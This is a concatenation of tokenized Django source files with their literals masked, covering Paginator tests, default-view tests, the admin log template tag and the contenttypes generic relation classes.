validate_number , '<STR_LIT:x>' ) <EOL> def test_paginator ( self ) : <EOL> """<STR_LIT>""" <EOL> nine = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ] <EOL> ten = nine + [ <NUM_LIT:10> ] <EOL> eleven = ten + [ <NUM_LIT:11> ] <EOL> tests = ( <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:0> , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:1> , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:2> , False ) , ( <NUM_LIT:10> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:5> , False ) , ( <NUM_LIT:10> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:6> , False ) , ( <NUM_LIT:10> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:10> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:5> , True ) , ( <NUM_LIT:10> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , <NUM_LIT:6> , True ) , ( <NUM_LIT:10> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:0> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:1> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:2> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , 
<NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:0> , False ) , ( <NUM_LIT:0> , <NUM_LIT:0> , [ ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:1> , False ) , ( <NUM_LIT:0> , <NUM_LIT:0> , [ ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:2> , False ) , ( <NUM_LIT:0> , <NUM_LIT:0> , [ ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:1> , <NUM_LIT:0> , True ) , ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ ] , <NUM_LIT:1> , <NUM_LIT:0> , False ) , ( <NUM_LIT:0> , <NUM_LIT:0> , [ ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:2> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( nine , <NUM_LIT:10> , <NUM_LIT:0> , True ) , ( <NUM_LIT:9> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:1> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:2> , <NUM_LIT:0> , True ) , ( <NUM_LIT:2> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( ten , <NUM_LIT:10> , <NUM_LIT:0> , True ) , ( <NUM_LIT:10> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:1> , <NUM_LIT:0> , True ) , ( <NUM_LIT:2> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <NUM_LIT:2> , <NUM_LIT:0> , True ) , ( <NUM_LIT:3> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( eleven , <NUM_LIT:10> , <NUM_LIT:0> , 
True ) , ( <NUM_LIT:11> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:1> , <NUM_LIT:1> , True ) , ( <NUM_LIT:2> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <NUM_LIT:2> , <NUM_LIT:1> , True ) , ( <NUM_LIT:3> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( eleven , <NUM_LIT:10> , <NUM_LIT:1> , True ) , ( <NUM_LIT:11> , <NUM_LIT:1> , [ <NUM_LIT:1> ] ) ) , <EOL> ( ( ten , '<STR_LIT:4>' , <NUM_LIT:1> , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , u'<STR_LIT:4>' , <NUM_LIT:1> , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , '<STR_LIT:1>' , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ( ( ten , <NUM_LIT:4> , u'<STR_LIT:1>' , False ) , ( <NUM_LIT:10> , <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) ) , <EOL> ) <EOL> for params , output in tests : <EOL> self . check_paginator ( params , output ) <EOL> def check_indexes ( self , params , page_num , indexes ) : <EOL> """<STR_LIT>""" <EOL> paginator = Paginator ( * params ) <EOL> if page_num == '<STR_LIT>' : <EOL> page_num = <NUM_LIT:1> <EOL> elif page_num == '<STR_LIT>' : <EOL> page_num = paginator . num_pages <EOL> page = paginator . page ( page_num ) <EOL> start , end = indexes <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( start , page . start_index ( ) , <EOL> msg % ( '<STR_LIT>' , page_num , start , page . start_index ( ) , params ) ) <EOL> self . assertEqual ( end , page . end_index ( ) , <EOL> msg % ( '<STR_LIT>' , page_num , end , page . 
end_index ( ) , params ) ) <EOL> def test_page_indexes ( self ) : <EOL> """<STR_LIT>""" <EOL> ten = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> ] <EOL> tests = ( <EOL> ( ( ten , <NUM_LIT:1> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:10> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:2> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:9> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:3> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:10> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:5> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:5> ) , ( <NUM_LIT:6> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:1> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:9> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:1> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:8> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:3> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:7> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:3> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:7> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:3> , <NUM_LIT:4> , True ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:4> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:5> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:5> ) , ( <NUM_LIT:6> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:5> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:5> ) , ( <NUM_LIT:6> , <NUM_LIT:10> ) ) , <EOL> ( ( ten , <NUM_LIT:5> , <NUM_LIT:5> , True ) , ( <NUM_LIT:1> , <NUM_LIT:10> ) , ( <NUM_LIT:1> , <NUM_LIT:10> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:0> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:1> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , 
<NUM_LIT:4> , <NUM_LIT:2> , False ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ <NUM_LIT:1> ] , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:0> , True ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:1> , True ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) , <EOL> ) <EOL> for params , first , last in tests : <EOL> self . check_indexes ( params , '<STR_LIT>' , first ) <EOL> self . check_indexes ( params , '<STR_LIT>' , last ) <EOL> self . assertRaises ( EmptyPage , self . check_indexes , ( [ ] , <NUM_LIT:4> , <NUM_LIT:0> , False ) , <NUM_LIT:1> , None ) <EOL> self . assertRaises ( EmptyPage , self . check_indexes , ( [ ] , <NUM_LIT:4> , <NUM_LIT:1> , False ) , <NUM_LIT:1> , None ) <EOL> self . assertRaises ( EmptyPage , self . check_indexes , ( [ ] , <NUM_LIT:4> , <NUM_LIT:2> , False ) , <NUM_LIT:1> , None ) <EOL> def test_page_sequence ( self ) : <EOL> """<STR_LIT>""" <EOL> eleven = '<STR_LIT>' <EOL> page2 = Paginator ( eleven , per_page = <NUM_LIT:5> , orphans = <NUM_LIT:1> ) . page ( <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( page2 ) , <NUM_LIT:6> ) <EOL> self . assertTrue ( '<STR_LIT:k>' in page2 ) <EOL> self . assertFalse ( '<STR_LIT:a>' in page2 ) <EOL> self . assertEqual ( '<STR_LIT>' . join ( page2 ) , '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' . join ( reversed ( page2 ) ) , '<STR_LIT>' ) </s>
<s> from datetime import datetime <EOL> from django . core . files import storage <EOL> class DummyStorage ( storage . Storage ) : <EOL> """<STR_LIT>""" <EOL> def _save ( self , name , content ) : <EOL> return '<STR_LIT>' <EOL> def delete ( self , name ) : <EOL> pass <EOL> def exists ( self , name ) : <EOL> pass <EOL> def modified_time ( self , name ) : <EOL> return datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) </s>
<s> </s>
<s> from __future__ import absolute_import <EOL> from django . conf . urls import patterns <EOL> from . views import empty_view <EOL> urlpatterns = patterns ( '<STR_LIT>' ) <EOL> handler404 = empty_view <EOL> handler500 = empty_view </s>
<s> from __future__ import absolute_import <EOL> from django . test import TestCase <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from . . models import Author , Article , UrlArticle <EOL> class DefaultsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> non_existing_urls = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def test_shortcut_with_absolute_url ( self ) : <EOL> "<STR_LIT>" <EOL> for obj in Author . objects . all ( ) : <EOL> short_url = '<STR_LIT>' % ( ContentType . objects . get_for_model ( Author ) . id , obj . pk ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertRedirects ( response , '<STR_LIT>' % obj . get_absolute_url ( ) , <EOL> status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> def test_shortcut_no_absolute_url ( self ) : <EOL> "<STR_LIT>" <EOL> for obj in Article . objects . all ( ) : <EOL> short_url = '<STR_LIT>' % ( ContentType . objects . get_for_model ( Article ) . id , obj . pk ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_wrong_type_pk ( self ) : <EOL> short_url = '<STR_LIT>' % ( ContentType . objects . get_for_model ( Author ) . id , '<STR_LIT>' ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_shortcut_bad_pk ( self ) : <EOL> short_url = '<STR_LIT>' % ( ContentType . objects . get_for_model ( Author ) . id , '<STR_LIT>' ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_nonint_content_type ( self ) : <EOL> an_author = Author . objects . all ( ) [ <NUM_LIT:0> ] <EOL> short_url = '<STR_LIT>' % ( '<STR_LIT>' , an_author . pk ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . 
status_code , <NUM_LIT> ) <EOL> def test_bad_content_type ( self ) : <EOL> an_author = Author . objects . all ( ) [ <NUM_LIT:0> ] <EOL> short_url = '<STR_LIT>' % ( <NUM_LIT> , an_author . pk ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_page_not_found ( self ) : <EOL> "<STR_LIT>" <EOL> for url in self . non_existing_urls : <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_csrf_token_in_404 ( self ) : <EOL> """<STR_LIT>""" <EOL> for url in self . non_existing_urls : <EOL> response = self . client . get ( url ) <EOL> csrf_token = response . context [ '<STR_LIT>' ] <EOL> self . assertNotEqual ( str ( csrf_token ) , '<STR_LIT>' ) <EOL> self . assertNotEqual ( str ( csrf_token ) , '<STR_LIT>' ) <EOL> def test_server_error ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_get_absolute_url_attributes ( self ) : <EOL> "<STR_LIT>" <EOL> self . assertTrue ( getattr ( UrlArticle . get_absolute_url , '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' ) <EOL> article = UrlArticle . objects . get ( pk = <NUM_LIT:1> ) <EOL> self . assertTrue ( getattr ( article . get_absolute_url , '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' ) </s>
<s> from django import template <EOL> from django . contrib . admin . models import LogEntry <EOL> register = template . Library ( ) <EOL> class AdminLogNode ( template . Node ) : <EOL> def __init__ ( self , limit , varname , user ) : <EOL> self . limit , self . varname , self . user = limit , varname , user <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def render ( self , context ) : <EOL> if self . user is None : <EOL> context [ self . varname ] = LogEntry . objects . all ( ) . select_related ( '<STR_LIT>' , '<STR_LIT:user>' ) [ : self . limit ] <EOL> else : <EOL> user_id = self . user <EOL> if not user_id . isdigit ( ) : <EOL> user_id = context [ self . user ] . id <EOL> context [ self . varname ] = LogEntry . objects . filter ( user__id__exact = user_id ) . select_related ( '<STR_LIT>' , '<STR_LIT:user>' ) [ : int ( self . limit ) ] <EOL> return '<STR_LIT>' <EOL> @ register . tag <EOL> def get_admin_log ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> tokens = token . contents . split ( ) <EOL> if len ( tokens ) < <NUM_LIT:4> : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" ) <EOL> if not tokens [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" ) <EOL> if tokens [ <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" ) <EOL> if len ( tokens ) > <NUM_LIT:4> : <EOL> if tokens [ <NUM_LIT:4> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" ) <EOL> return AdminLogNode ( limit = tokens [ <NUM_LIT:1> ] , varname = tokens [ <NUM_LIT:3> ] , user = ( len ( tokens ) > <NUM_LIT:5> and tokens [ <NUM_LIT:5> ] or None ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from collections import defaultdict <EOL> from functools import partial <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . db import connection <EOL> from django . db . models import signals <EOL> from django . db import models , router , DEFAULT_DB_ALIAS <EOL> from django . db . models . fields . related import RelatedField , Field , ManyToManyRel <EOL> from django . db . models . loading import get_model <EOL> from django . forms import ModelForm <EOL> from django . forms . models import BaseModelFormSet , modelformset_factory , save_instance <EOL> from django . contrib . admin . options import InlineModelAdmin , flatten_fieldsets <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . utils . encoding import smart_text <EOL> class GenericForeignKey ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ct_field = "<STR_LIT>" , fk_field = "<STR_LIT>" ) : <EOL> self . ct_field = ct_field <EOL> self . fk_field = fk_field <EOL> def contribute_to_class ( self , cls , name ) : <EOL> self . name = name <EOL> self . model = cls <EOL> self . cache_attr = "<STR_LIT>" % name <EOL> cls . _meta . add_virtual_field ( self ) <EOL> signals . pre_init . connect ( self . instance_pre_init , sender = cls , weak = False ) <EOL> setattr ( cls , name , self ) <EOL> def instance_pre_init ( self , signal , sender , args , kwargs , ** _kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . name in kwargs : <EOL> value = kwargs . pop ( self . name ) <EOL> kwargs [ self . ct_field ] = self . get_content_type ( obj = value ) <EOL> kwargs [ self . fk_field ] = value . _get_pk_val ( ) <EOL> def get_content_type ( self , obj = None , id = None , using = None ) : <EOL> ContentType = get_model ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if obj : <EOL> return ContentType . objects . db_manager ( obj . _state . db ) . 
get_for_model ( obj ) <EOL> elif id : <EOL> return ContentType . objects . db_manager ( using ) . get_for_id ( id ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> fk_dict = defaultdict ( set ) <EOL> instance_dict = { } <EOL> ct_attname = self . model . _meta . get_field ( self . ct_field ) . get_attname ( ) <EOL> for instance in instances : <EOL> ct_id = getattr ( instance , ct_attname ) <EOL> if ct_id is not None : <EOL> fk_val = getattr ( instance , self . fk_field ) <EOL> if fk_val is not None : <EOL> fk_dict [ ct_id ] . add ( fk_val ) <EOL> instance_dict [ ct_id ] = instance <EOL> ret_val = [ ] <EOL> for ct_id , fkeys in fk_dict . items ( ) : <EOL> instance = instance_dict [ ct_id ] <EOL> ct = self . get_content_type ( id = ct_id , using = instance . _state . db ) <EOL> ret_val . extend ( ct . get_all_objects_for_this_type ( pk__in = fkeys ) ) <EOL> def gfk_key ( obj ) : <EOL> ct_id = getattr ( obj , ct_attname ) <EOL> if ct_id is None : <EOL> return None <EOL> else : <EOL> model = self . get_content_type ( id = ct_id , <EOL> using = obj . _state . db ) . model_class ( ) <EOL> return ( model . _meta . pk . get_prep_value ( getattr ( obj , self . fk_field ) ) , <EOL> model ) <EOL> return ( ret_val , <EOL> lambda obj : ( obj . _get_pk_val ( ) , obj . __class__ ) , <EOL> gfk_key , <EOL> True , <EOL> self . cache_attr ) <EOL> def is_cached ( self , instance ) : <EOL> return hasattr ( instance , self . cache_attr ) <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> try : <EOL> return getattr ( instance , self . cache_attr ) <EOL> except AttributeError : <EOL> rel_obj = None <EOL> f = self . model . _meta . get_field ( self . ct_field ) <EOL> ct_id = getattr ( instance , f . get_attname ( ) , None ) <EOL> if ct_id : <EOL> ct = self . get_content_type ( id = ct_id , using = instance . _state . db ) <EOL> try : <EOL> rel_obj = ct . 
get_object_for_this_type ( pk = getattr ( instance , self . fk_field ) ) <EOL> except ObjectDoesNotExist : <EOL> pass <EOL> setattr ( instance , self . cache_attr , rel_obj ) <EOL> return rel_obj <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" % self . related . opts . object_name ) <EOL> ct = None <EOL> fk = None <EOL> if value is not None : <EOL> ct = self . get_content_type ( obj = value ) <EOL> fk = value . _get_pk_val ( ) <EOL> setattr ( instance , self . ct_field , ct ) <EOL> setattr ( instance , self . fk_field , fk ) <EOL> setattr ( instance , self . cache_attr , value ) <EOL> class GenericRelation ( RelatedField , Field ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , to , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , None ) <EOL> kwargs [ '<STR_LIT>' ] = GenericRel ( to , <EOL> related_name = kwargs . pop ( '<STR_LIT:related_name>' , None ) , <EOL> limit_choices_to = kwargs . pop ( '<STR_LIT>' , None ) , <EOL> symmetrical = kwargs . pop ( '<STR_LIT>' , True ) ) <EOL> self . object_id_field_name = kwargs . pop ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . content_type_field_name = kwargs . pop ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> kwargs [ '<STR_LIT:blank>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> Field . __init__ ( self , ** kwargs ) <EOL> def get_choices_default ( self ) : <EOL> return Field . get_choices ( self , include_blank = False ) <EOL> def value_to_string ( self , obj ) : <EOL> qs = getattr ( obj , self . name ) . all ( ) <EOL> return smart_text ( [ instance . _get_pk_val ( ) for instance in qs ] ) <EOL> def m2m_db_table ( self ) : <EOL> return self . rel . to . _meta . db_table <EOL> def m2m_column_name ( self ) : <EOL> return self . object_id_field_name <EOL> def m2m_reverse_name ( self ) : <EOL> return self . rel . to . _meta . pk . column <EOL> def m2m_target_field_name ( self ) : <EOL> return self . 
model . _meta . pk . name <EOL> def m2m_reverse_target_field_name ( self ) : <EOL> return self . rel . to . _meta . pk . name <EOL> def contribute_to_class ( self , cls , name ) : <EOL> super ( GenericRelation , self ) . contribute_to_class ( cls , name ) <EOL> self . model = cls <EOL> setattr ( cls , self . name , ReverseGenericRelatedObjectsDescriptor ( self ) ) <EOL> def contribute_to_related_class ( self , cls , related ) : <EOL> pass <EOL> def set_attributes_from_rel ( self ) : <EOL> pass <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def db_type ( self , connection ) : <EOL> return None <EOL> def extra_filters ( self , pieces , pos , negate ) : <EOL> """<STR_LIT>""" <EOL> if negate : <EOL> return [ ] <EOL> ContentType = get_model ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> content_type = ContentType . objects . get_for_model ( self . model ) <EOL> prefix = "<STR_LIT>" . join ( pieces [ : pos + <NUM_LIT:1> ] ) <EOL> return [ ( "<STR_LIT>" % ( prefix , self . content_type_field_name ) , <EOL> content_type ) ] <EOL> def bulk_related_objects ( self , objs , using = DEFAULT_DB_ALIAS ) : <EOL> """<STR_LIT>""" <EOL> return self . rel . to . _base_manager . db_manager ( using ) . filter ( ** { <EOL> "<STR_LIT>" % self . content_type_field_name : <EOL> ContentType . objects . db_manager ( using ) . get_for_model ( self . model ) . pk , <EOL> "<STR_LIT>" % self . object_id_field_name : <EOL> [ obj . pk for obj in objs ] <EOL> } ) <EOL> class ReverseGenericRelatedObjectsDescriptor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , field ) : <EOL> self . field = field <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> from django . contrib . contenttypes . models import ContentType <EOL> rel_model = self . field . rel . to <EOL> superclass = rel_model . _default_manager . __class__ <EOL> RelatedManager = create_generic_related_manager ( superclass ) <EOL> qn = connection . ops . 
quote_name <EOL> content_type = ContentType . objects . db_manager ( instance . _state . db ) . get_for_model ( instance ) <EOL> manager = RelatedManager ( <EOL> model = rel_model , <EOL> instance = instance , <EOL> symmetrical = ( self . field . rel . symmetrical and instance . __class__ == rel_model ) , <EOL> source_col_name = qn ( self . field . m2m_column_name ( ) ) , <EOL> target_col_name = qn ( self . field . m2m_reverse_name ( ) ) , <EOL> content_type = content_type , <EOL> content_type_field_name = self . field . content_type_field_name , <EOL> object_id_field_name = self . field . object_id_field_name , <EOL> prefetch_cache_name = self . field . attname , <EOL> ) <EOL> return manager <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> manager = self . __get__ ( instance ) <EOL> manager . clear ( ) <EOL> for obj in value : <EOL> manager . add ( obj ) <EOL> def create_generic_related_manager ( superclass ) : <EOL> """<STR_LIT>""" <EOL> class GenericRelatedObjectManager ( superclass ) : <EOL> def __init__ ( self , model = None , instance = None , symmetrical = None , <EOL> source_col_name = None , target_col_name = None , content_type = None , <EOL> content_type_field_name = None , object_id_field_name = None , <EOL> prefetch_cache_name = None ) : <EOL> super ( GenericRelatedObjectManager , self ) . __init__ ( ) <EOL> self . model = model <EOL> self . content_type = content_type <EOL> self . symmetrical = symmetrical <EOL> self . instance = instance <EOL> self . source_col_name = source_col_name <EOL> self . target_col_name = target_col_name <EOL> self . content_type_field_name = content_type_field_name <EOL> self . object_id_field_name = object_id_field_name <EOL> self . prefetch_cache_name = prefetch_cache_name <EOL> self . pk_val = self . instance . _get_pk_val ( ) 